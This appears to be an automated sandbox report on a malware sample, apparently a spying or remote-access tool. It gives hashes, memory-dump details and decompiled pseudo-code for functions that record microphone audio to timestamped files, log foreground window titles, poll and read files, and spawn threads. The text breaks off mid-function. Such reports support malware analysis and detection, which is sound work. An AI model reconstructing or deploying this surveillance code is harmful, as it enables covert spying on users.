0x105cd358
0x105cd361
0x105cd361
0x105cd368
0x105cd369
0x105cd36b
0x105cd36b
0x00000000
0x105cd36b
0x105cd35a
0x105cd35f
0x00000000
0x00000000
0x00000000
0x105cd35f
0x105cd348
0x00000000
0x00000000
0x105cd34a
0x105cd34f
0x00000000
0x00000000
0x00000000
0x105cd34f
0x105cd327
0x105cd32e
0x105cd32f
0x105cd331
0x00000000
0x105cd331
0x105cd2ff
0x105cd306
0x105cd307
0x105cd309
0x00000000

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9609b60ad482849be7f0775b9ae825adec5be7e62851433c6d5ae4a03e3831c7
Instruction ID: db2a9bad3655658139c137ff4aaa6ce494f570161723c8a2404211f12ad9fdcd
Opcode Fuzzy Hash: 9609b60ad482849be7f0775b9ae825adec5be7e62851433c6d5ae4a03e3831c7
Instruction Fuzzy Hash: 5F41EA75A00784EFD714AFB8CE45B9ABFFDEBC8B10F10892AF541DB280D671A9418791

Uniqueness

Uniqueness Score: -1.00%

Function 0043C481, Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a5fab5ada6cfef24b75fb2c047679192d29c36a38110dc1207f8a641355624c
Instruction ID: 733164f05b9f7aeaec00074263a2a0c70db5c9dd2c0fe6a7367e2e5b9d18385d
Opcode Fuzzy Hash: 0a5fab5ada6cfef24b75fb2c047679192d29c36a38110dc1207f8a641355624c
Instruction Fuzzy Hash: 20412972600714BFD7249F78CC81B6ABBE8EB8C714F10952FF111EB281D779A9018B84

Uniqueness

Uniqueness Score: -1.00%

Function 10595B19, Relevance: 6.1, APIs: 4, Instructions: 128
synchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10595B19(void* __ecx, void* __edx, intOrPtr _a4, _Unknown_base(*)()* _a8, char _a12) {
				signed int _v12;
				signed int _v16;
				void* _v20;
				char _v44;
				char _v68;
				void* __ebx;
				void* __esi;
				void* _t41;
				signed int _t46;
				void* _t70;
				void* _t73;
				void* _t74;
				struct _SECURITY_ATTRIBUTES* _t77;
				void* _t101;
				intOrPtr _t103;
				void* _t105;
				void* _t106;
				void* _t107;

				_t101 = __edx;
				_v12 = _v12 & 0x00000000;
				_t105 = __ecx;
				_v20 = __ecx;
				 *(__ecx + 0x48) =  *(__ecx + 0x48) & 0x00000000;
				E10592F43(_t74,  &_v44);
				_t103 = _a4;
				_t8 = _t105 + 0x4c; // 0x46c184
				_t41 = _t8;
				while(E10595CBF(_t105, E10592E03(_t103),  &_v12, _t41) != 0) {
					_t10 = _t105 + 0x40; // 0x8
					_t46 =  *_t10 & 0x000000ff;
					_v16 = _t46;
					if(_v12 + _t46 <= E105932F7()) {
						_t77 = 0;
						__eflags = 0;
					} else {
						_t77 = 1;
						_t73 = E105932F7();
						_t105 = _v20;
						_t103 = _a4;
						 *((intOrPtr*)(_t105 + 0x48)) = _v16 + _v12 - _t73;
					}
					if(_t77 == 0) {
						_t78 = _v16;
						E10592E3F( &_v44, _t101, _t105, E10595114(_t103,  &_v68, _v16, 0xffffffff));
						E10592E35();
						E10592E3F( &_v44, _t101, _t105, E10595114( &_v44,  &_v68, 0, _v12));
						E10592E35();
						_t112 = _a12;
						if(_a12 != 0) {
							_t30 = _t105 + 0x1c; // 0x46c154
							E10592E1B(_t30,  &_v44);
							 *(_t105 + 0x34) = CreateEventA(0, 0, 0, 0);
							__eflags = 0;
							CreateThread(0, 0, _a8, _t105, 0, 0);
							_t33 = _t105 + 0x34; // 0x0
							WaitForSingleObject( *_t33, 0xffffffff);
							_t34 = _t105 + 0x34; // 0x0
							CloseHandle( *_t34);
						} else {
							_t107 = _t106 - 0x18;
							E10592F5A(_t78, _t107, _t101, _t112,  &_v44);
							_a8(_t105);
							_t106 = _t107 + 0x1c;
						}
						E10592E3F(_t103, _t101, _t105, E10595114(_t103,  &_v68, _v12 + _t78, 0xffffffff));
						E10592E35();
						_t70 = E105932F7();
						_t38 = _t105 + 0x4c; // 0x46c184
						_t41 = _t38;
						if(_t70 != 0) {
							continue;
						}
					}
					break;
				}
				return E10592E35();
			}

0x10595b19
0x10595b1f
0x10595b25
0x10595b2b
0x10595b2e
0x10595b32
0x10595b37
0x10595b3a
0x10595b3a
0x10595b3d
0x10595b59
0x10595b59
0x10595b62
0x10595b6e
0x10595b8c
0x10595b8c
0x10595b70
0x10595b72
0x10595b74
0x10595b7c
0x10595b82
0x10595b87
0x10595b87
0x10595b90
0x10595b96
0x10595bab
0x10595bb3
0x10595bcd
0x10595bd5
0x10595bda
0x10595be1
0x10595bf8
0x10595bfb
0x10595c0c
0x10595c0f
0x10595c19
0x10595c21
0x10595c24
0x10595c2a
0x10595c2d
0x10595be3
0x10595be3
0x10595be9
0x10595bef
0x10595bf2
0x10595bf2
0x10595c49
0x10595c51
0x10595c58
0x10595c5f
0x10595c5f
0x10595c62
0x00000000
0x00000000
0x10595c62
0x00000000
0x10595b90
0x10595c76

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,000000FF,00000000,00000000,0046C184), ref: 10595C06
CreateThread.KERNEL32(00000000,00000000,?,0046C138,00000000,00000000), ref: 10595C19
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,10595AB2,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10595C24
CloseHandle.KERNEL32(00000000,?,?,10595AB2,00000000,0000009C,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10595C2D

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: 5b6b611b49e1213bd87562da551e4e1ce449607d8c631bfeaacc394aa3a9b5aa
Instruction ID: efdc30acb778c609c9e1d328c5d43ede3213e10a4d0cb1eee818fbbaca4732c2
Opcode Fuzzy Hash: 5b6b611b49e1213bd87562da551e4e1ce449607d8c631bfeaacc394aa3a9b5aa
Instruction Fuzzy Hash: D1416F75900219AFCF04DBA4CC99DFEBFBDEF88265F040559F552A3291DA30AA15CB60

Uniqueness

Uniqueness Score: -1.00%

Function 105A036C, Relevance: 6.1, APIs: 4, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E105A036C(intOrPtr* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed short* _v20;
				intOrPtr _t41;
				intOrPtr _t44;
				intOrPtr _t46;
				signed short _t57;
				signed int _t58;
				intOrPtr _t59;
				intOrPtr* _t60;
				void* _t64;
				void* _t66;
				intOrPtr _t68;
				intOrPtr _t76;
				intOrPtr* _t79;
				intOrPtr _t80;
				void _t81;
				signed short* _t82;
				void* _t87;
				intOrPtr* _t88;
				void* _t89;

				_t88 = __ecx;
				_t87 = 1;
				_t41 =  *__ecx;
				_t68 =  *((intOrPtr*)(__ecx + 4));
				_v12 = _t68;
				if( *((intOrPtr*)(_t41 + 0x84)) != 0) {
					_t64 =  *((intOrPtr*)(_t41 + 0x80)) + _t68;
					if(IsBadHugeReadPtr(_t64, 0x14) == 0) {
						_t66 = _t64 + 0x10;
						while(1) {
							_t44 =  *((intOrPtr*)(_t66 - 4));
							if(_t44 == 0) {
								goto L23;
							}
							_t46 =  *((intOrPtr*)(_t88 + 0x24))(_t44 + _v12,  *((intOrPtr*)(_t88 + 0x34)));
							_v8 = _t46;
							if(_t46 == 0) {
								_push(0x7e);
								goto L22;
							} else {
								_push(4 +  *(_t88 + 0xc) * 4);
								_push( *((intOrPtr*)(_t88 + 8)));
								_t80 = E105CBCA2();
								if(_t80 == 0) {
									 *((intOrPtr*)(_t88 + 0x2c))(_v8,  *((intOrPtr*)(_t88 + 0x34)));
									_push(0xe);
									L22:
									SetLastError();
									_t87 = 0;
								} else {
									 *((intOrPtr*)(_t88 + 8)) = _t80;
									 *((intOrPtr*)(_t80 +  *(_t88 + 0xc) * 4)) = _v8;
									 *(_t88 + 0xc) =  *(_t88 + 0xc) + 1;
									_t81 =  *(_t66 - 0x10);
									if(_t81 == 0) {
										_t81 =  *_t66;
									}
									_t82 = _t81 + _v12;
									_t76 = _v8;
									_v16 =  *_t66 + _v12;
									_v20 = _t82;
									if( *_t82 != 0) {
										while(1) {
											_t57 =  *_t82;
											_push( *((intOrPtr*)(_t88 + 0x34)));
											if(_t57 >= 0) {
												_t58 = _t57 + _v12 + 2;
											} else {
												_t58 = _t57 & 0x0000ffff;
											}
											_t59 =  *((intOrPtr*)(_t88 + 0x28))(_t76, _t58);
											_t79 = _v16;
											_t89 = _t89 + 0xc;
											 *_t79 = _t59;
											_t60 = _t79;
											_t76 = _v8;
											if( *_t60 == 0) {
												break;
											}
											_t82 =  &(_v20[2]);
											_v16 = _t60 + 4;
											_v20 = _t82;
											if( *_t82 != 0) {
												continue;
											} else {
											}
											goto L16;
										}
										_t87 = 0;
									}
									L16:
									if(_t87 == 0) {
										 *((intOrPtr*)(_t88 + 0x2c))(_t76,  *((intOrPtr*)(_t88 + 0x34)));
										SetLastError(0x7f);
									} else {
										_t66 = _t66 + 0x14;
										if(IsBadHugeReadPtr(_t66 - 0x10, 0x14) == 0) {
											continue;
										} else {
										}
									}
								}
							}
							goto L23;
						}
					}
					L23:
				}
				return _t87;
			}

0x105a0373
0x105a0378
0x105a0379
0x105a037b
0x105a037e
0x105a0388
0x105a0395
0x105a03a2
0x105a03a8
0x105a03ab
0x105a03ab
0x105a03b0
0x00000000
0x00000000
0x105a03bd
0x105a03c0
0x105a03c7
0x105a049e
0x00000000
0x105a03cd
0x105a03d7
0x105a03d8
0x105a03e0
0x105a03e6
0x105a0495
0x105a049a
0x105a04a0
0x105a04a0
0x105a04a6
0x105a03ec
0x105a03f2
0x105a03f5
0x105a03f8
0x105a03fb
0x105a0400
0x105a0402
0x105a0402
0x105a0404
0x105a040c
0x105a0412
0x105a0415
0x105a0418
0x105a041a
0x105a041a
0x105a041c
0x105a0421
0x105a042e
0x105a0423
0x105a0423
0x105a0423
0x105a0432
0x105a0435
0x105a0438
0x105a043b
0x105a043d
0x105a043f
0x105a0445
0x00000000
0x00000000
0x105a044d
0x105a0450
0x105a0453
0x105a0459
0x00000000
0x00000000
0x105a045b
0x00000000
0x105a0459
0x105a045d
0x105a045d
0x105a045f
0x105a0461
0x105a0480
0x105a0487
0x105a0463
0x105a0463
0x105a0474
0x00000000
0x00000000
0x105a047a
0x105a0474
0x105a0461
0x105a03e6
0x00000000
0x105a03c7
0x105a03ab
0x105a04a8
0x105a04a8
0x105a04b0

APIs

IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 105A039A
IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 105A046C
SetLastError.KERNEL32(0000007F), ref: 105A0487
SetLastError.KERNEL32(0000007E,?,105A0709), ref: 105A04A0

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: dbeb3da561d95d77c32e75e82459f6f19270ad197ccf04568eae6f8e0ed74529
Instruction ID: afb7c9ec13f5bb31c80a3a75ba48dd84463a52a9f04e38b6b3ad7a76891aeb8e
Opcode Fuzzy Hash: dbeb3da561d95d77c32e75e82459f6f19270ad197ccf04568eae6f8e0ed74529
Instruction Fuzzy Hash: 51418771A10205EFEB10CF59D884B6EBBF5FF88711F109869E68697281EB71E900DB20

Uniqueness

Uniqueness Score: -1.00%

Function 105DA21A, Relevance: 6.1, APIs: 4, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E105DA21A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_v8 =  *0x46a00c ^ _t70;
				E105C6375(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E105C0B89(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x43
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E105C2D6E(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E105C1A0E(_t69);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x43
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x43
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E105D07FA(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E105E167E();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}

0x105da229
0x105da235
0x105da23a
0x105da23f
0x105da244
0x105da247
0x105da249
0x105da249
0x105da24e
0x105da267
0x105da26d
0x105da272
0x105da311
0x105da315
0x105da31a
0x105da31a
0x105da336
0x105da336
0x105da278
0x105da27b
0x105da280
0x105da284
0x105da2d0
0x105da2d2
0x105da2d4
0x105da2d9
0x105da2f0
0x105da2f8
0x105da308
0x105da308
0x105da2f8
0x105da30a
0x105da30b
0x00000000
0x105da310
0x105da286
0x105da28b
0x105da28d
0x105da28f
0x105da28f
0x105da297
0x105da2b4
0x105da2be
0x105da2c3
0x00000000
0x00000000
0x105da2c5
0x105da2cb
0x105da2cb
0x00000000
0x105da2cb
0x105da29b
0x105da29f
0x105da2a4
0x105da2a8
0x00000000
0x00000000
0x105da2aa
0x00000000

APIs

MultiByteToWideChar.KERNEL32(0000003B,00000000,00000006,?,00000000,00000000,?,?,?,0000003B,00000001,?,00000006,00000001,?,?), ref: 105DA267
MultiByteToWideChar.KERNEL32(0000003B,00000001,00000006,?,00000000,?,?,?,0000003B,00000001,?,00000006,00000001,?,?,0000003B), ref: 105DA2F0
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,0000003B,00000001,?,00000006,00000001,?,?,0000003B,00000002,?), ref: 105DA302
__freea.LIBCMT ref: 105DA30B

Part of subcall function 105D07FA: RtlAllocateHeap.NTDLL(00000000,?), ref: 105D082C

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 2547f79aa2ce97ebef8943f529e29c31ea25f9519c78378d0bb7a28436d94ffe
Instruction ID: 1d39251c41dcb0a3821b7edfbb751f777dc497b128412269edbce91f6c4da5bd
Opcode Fuzzy Hash: 2547f79aa2ce97ebef8943f529e29c31ea25f9519c78378d0bb7a28436d94ffe
Instruction Fuzzy Hash: B631DE32A0020AABDF158FA9DC45EAF7FA5EB40750F01452AFC05D7290EB35DD91CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10592B5D, Relevance: 6.1, APIs: 4, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E10592B5D(void* __ebx, void* __edi, intOrPtr _a8) {
				char _v84;
				char _v112;
				void* _v116;
				char _v136;
				void* _v140;
				char _v160;
				void* _v164;
				char _v184;
				void* _v188;
				char _v204;
				char _v208;
				void* _v212;
				char _v228;
				char _v232;
				char _v236;
				void* __esi;
				void* _t29;
				void* _t75;

				_t47 = __ebx;
				_push(_t75);
				E10592DDB(__ebx,  &_v228);
				_t82 = _a8 - 0x3c0;
				if(_a8 == 0x3c0) {
					E1059255E();
					E105C6527( &_v84, 0x50, 0x45f3f0, E10592556());
					E10592EF2(__ebx,  &_v204,  &_v84);
					_t29 = E105A8148( &_v112,  &_v208);
					E10592D68( &_v232, _t31, _t75, E10593F14(_t47,  &_v184, E10593E9E( &_v160, E10593E68(__ebx,  &_v136, 0x46c0e0, 0x5c), _t29), __edi, _t82, 0x45f400));
					E10592D5E();
					E10592D5E();
					E10592D5E();
					E10592D5E();
					E10592E35();
					E105928D2(E10592D59( &_v236), 0x46ba78);
					waveInUnprepareHeader( *0x46bab0, 0x46ba78, 0x20);
					0x46ba78->lpData = E10592E03(0x46c0f8);
					 *0x46ba7c =  *0x46bab4;
					 *0x46ba80 = 0;
					 *0x46ba84 = 0;
					 *0x46ba88 = 0;
					 *0x46ba8c = 0;
					waveInPrepareHeader( *0x46bab0, 0x46ba78, 0x20);
					waveInAddBuffer( *0x46bab0, 0x46ba78, 0x20);
				}
				return E10592D5E();
			}

0x10592b5d
0x10592b6d
0x10592b6e
0x10592b73
0x10592b7a
0x10592b84
0x10592ba2
0x10592bb6
0x10592bcb
0x10592bff
0x10592c08
0x10592c11
0x10592c1a
0x10592c26
0x10592c2f
0x10592c46
0x10592c54
0x10592c66
0x10592c77
0x10592c7e
0x10592c83
0x10592c88
0x10592c8d
0x10592c92
0x10592ca1
0x10592ca1
0x10592cb4

APIs

_strftime.LIBCMT ref: 10592BA2

Part of subcall function 105928D2: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1059293A

waveInUnprepareHeader.WINMM(0046BA78,00000020,00000000,?), ref: 10592C54
waveInPrepareHeader.WINMM(0046BA78,00000020), ref: 10592C92
waveInAddBuffer.WINMM(0046BA78,00000020), ref: 10592CA1

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID:
API String ID: 3809562944-0
Opcode ID: 87685d2b9442a98e480f628d0fe5e7b34b9df1dae7f4d06bc68124184a98d097
Instruction ID: 2b20bba77fe0b32e24003aea87691042d7bb680f8e6830ecd17c0134729d56d4
Opcode Fuzzy Hash: 87685d2b9442a98e480f628d0fe5e7b34b9df1dae7f4d06bc68124184a98d097
Instruction Fuzzy Hash: 7C318E355043449BC314EF64EC5AEAF7FA8EB94340F40843DF595961A0FF70AA4ACB96

Uniqueness

Uniqueness Score: -1.00%

Function 00408A51, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 82sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00417ABF: GetForegroundWindow.USER32(73B76490,?), ref: 00417ACF
Part of subcall function 00417ABF: GetWindowTextLengthW.USER32(00000000), ref: 00417AD8
Part of subcall function 00417ABF: GetWindowTextW.USER32 ref: 00417B02

Sleep.KERNEL32(000001F4), ref: 00408AAF
Sleep.KERNEL32(00000064), ref: 00408B49

Strings

[ , xrefs: 00408AC7
], xrefs: 00408AB3

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 61ffcbbbe14b13f04157bb48f78c33ab662183f2310c94efc5ab64b36d35b440
Instruction ID: 8573281f0cdc3ffc3b69c5d15ae9f7dd0d08734189249b75f226d29c1755f02c
Opcode Fuzzy Hash: 61ffcbbbe14b13f04157bb48f78c33ab662183f2310c94efc5ab64b36d35b440
Instruction Fuzzy Hash: EE21B0B160420067C604B676DD1396F72699F90348F40043FF982772E3EE3DAA09869F

Uniqueness

Uniqueness Score: -1.00%

Function 0043D288, Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db438a00ac30559f4f193afadc31410c96385359a40aac0a007d396ff2af39bb
Instruction ID: e4b0062e58d0d7237c716dd182029255e048b2798701f0240ba592bb915f7d8f
Opcode Fuzzy Hash: db438a00ac30559f4f193afadc31410c96385359a40aac0a007d396ff2af39bb
Instruction Fuzzy Hash: 5101F2B2A097063EF6212A783CC1F27220CDF453B8F341B6BF521622D5DE78CC014168

Uniqueness

Uniqueness Score: -1.00%

Function 0043D307, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35b35c0bef6846c723b1eec02a1325ea3f2ea48b9f05e2900ff3fad41c018c60
Instruction ID: af3406132430cef04dbb00c021b8739ed0fb4e326e8fb5295b0caa8951ed8692
Opcode Fuzzy Hash: 35b35c0bef6846c723b1eec02a1325ea3f2ea48b9f05e2900ff3fad41c018c60
Instruction Fuzzy Hash: 6D0167B29096167AA71125797CC1D6B631CEF553B9B20132BB921512D1DA78CC114169

Uniqueness

Uniqueness Score: -1.00%

Function 10599A2E, Relevance: 6.1, APIs: 4, Instructions: 58
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10599A2E(void* __ecx, void* __edx) {
				void* __ebx;
				int _t9;
				long _t14;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t30;

				_t22 = __edx;
				_t9 =  *0x46c3f8 |  *0x46c3fc;
				_t24 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x39)) = 0;
					do {
						_t9 = CreateFileW(E10592D59(0x46c3b0), 0x80000000, 7, 0, 3, 0x80, 0);
						_t23 = _t9;
						if(_t23 == 0xffffffff) {
							 *((char*)(_t24 + 0x39)) = 0;
						} else {
							_t14 = GetFileSize(_t23, 0);
							_t30 = 0 -  *0x46c3fc;
							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x46c3f8)) {
								 *((char*)(_t24 + 0x39)) = 1;
								if( *((intOrPtr*)(_t24 + 0x49)) != 0) {
									E1059A417(0, _t24);
								}
								Sleep(0x2710);
							}
							_t9 = CloseHandle(_t23);
						}
					} while ( *((char*)(_t24 + 0x39)) == 1);
					if( *((intOrPtr*)(_t24 + 0x49)) == 0) {
						_t35 =  *0x46a9d4 - 0x31;
						if( *0x46a9d4 == 0x31) {
							E105981BE(0, _t25 - 0x18, _t22, _t35, _t24 + 0x60);
							return E105995B0(_t24);
						}
					}
				}
				return _t9;
			}

0x10599a2e
0x10599a33
0x10599a3c
0x10599a3e
0x10599a46
0x10599a49
0x10599a64
0x10599a6a
0x10599a6f
0x10599aaf
0x10599a71
0x10599a73
0x10599a79
0x10599a7f
0x10599a8b
0x10599a92
0x10599a96
0x10599a96
0x10599aa0
0x10599aa0
0x10599aa7
0x10599aa7
0x10599ab2
0x10599abb
0x10599abd
0x10599ac4
0x10599acf
0x00000000
0x10599ad6
0x10599ac4
0x10599abb
0x10599ade

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,10599B05), ref: 10599A64
GetFileSize.KERNEL32(00000000,00000000,?,?,?,10599B05), ref: 10599A73
Sleep.KERNEL32(00002710,?,?,?,10599B05), ref: 10599AA0
CloseHandle.KERNEL32(00000000,?,?,?,10599B05), ref: 10599AA7

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID:
API String ID: 1958988193-0
Opcode ID: 71eb9f2a0935b1f007b4f6b80da6e27fbbd2f56b936bf55f49f24ed5d95080b1
Instruction ID: 06c456c37fb42e9fa26f4319d07626dcdfaec8fe9aa64a0fad8310973fa9b5cd
Opcode Fuzzy Hash: 71eb9f2a0935b1f007b4f6b80da6e27fbbd2f56b936bf55f49f24ed5d95080b1
Instruction Fuzzy Hash: B21184302017426FD7115B789CC9A2E3FBFEBC5281F04885DF5C147655D6A4EC948357

Uniqueness

Uniqueness Score: -1.00%

Function 00408BC0, Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408C97), ref: 00408BF6
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408C97), ref: 00408C05
Sleep.KERNEL32(00002710,?,?,?,00408C97), ref: 00408C32
CloseHandle.KERNEL32(00000000,?,?,?,00408C97), ref: 00408C39

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID:
API String ID: 1958988193-0
Opcode ID: fd32d5470f6a82b64451d4a6fc001d2afe9d9ea922123fe35fcf77b3356e9bff
Instruction ID: f48aa324faeb3bf29cf9054a7041348a4769ce812d4e844a5eb2815f39313da9
Opcode Fuzzy Hash: fd32d5470f6a82b64451d4a6fc001d2afe9d9ea922123fe35fcf77b3356e9bff
Instruction Fuzzy Hash: F9112B702067406FFA35AB349EC962F7AA99741741F04487FF6C2726D2CA79D894833E

Uniqueness

Uniqueness Score: -1.00%

Function 105A884A, Relevance: 6.1, APIs: 4, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E105A884A(WCHAR* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				struct _OVERLAPPED* _t13;
				struct _OVERLAPPED* _t15;
				void* _t22;
				long _t25;

				_push(__ecx);
				_push(__ecx);
				_t15 = 0;
				_v8 = __edx;
				_t22 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t25 = GetFileSize(_t22, 0);
					E105932C7(0, _v8, _t22, _t25, 0);
					_v12 = 0;
					if(ReadFile(_t22, E10592E03(_v8), _t25,  &_v12, 0) != 0) {
						_t15 = 1;
					}
					CloseHandle(_t22);
					_t13 = _t15;
				} else {
					_t13 = 0;
				}
				return _t13;
			}

0x105a884d
0x105a884e
0x105a8851
0x105a8853
0x105a886d
0x105a8872
0x105a8884
0x105a8888
0x105a8896
0x105a88a9
0x105a88ab
0x105a88ab
0x105a88ae
0x105a88b4
0x105a8874
0x105a8874
0x105a8874
0x105a88bb

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,1059509E,0045F464), ref: 105A8867
GetFileSize.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,1059509E,0045F464), ref: 105A887B
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,1059509E,0045F464), ref: 105A88A0
CloseHandle.KERNEL32(00000000,00000000,00000000,?,1059509E,0045F464), ref: 105A88AE

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 21a53a381177d8aada825ebcf4af9ebb9d3ac045571280622984ad868f42abc5
Instruction ID: 649c8eb9965619f7dfd6adbb29cda996b573986d84320201e2c814b08aa72214
Opcode Fuzzy Hash: 21a53a381177d8aada825ebcf4af9ebb9d3ac045571280622984ad868f42abc5
Instruction Fuzzy Hash: 2701D174501219BFE7109F60ACC9EBFBB6CDB862A6F1005A9FC00A3281CA349F019670

Uniqueness

Uniqueness Score: -1.00%

Function 105D2EA1, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E105D2EA1(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x46b658 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x458b78 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
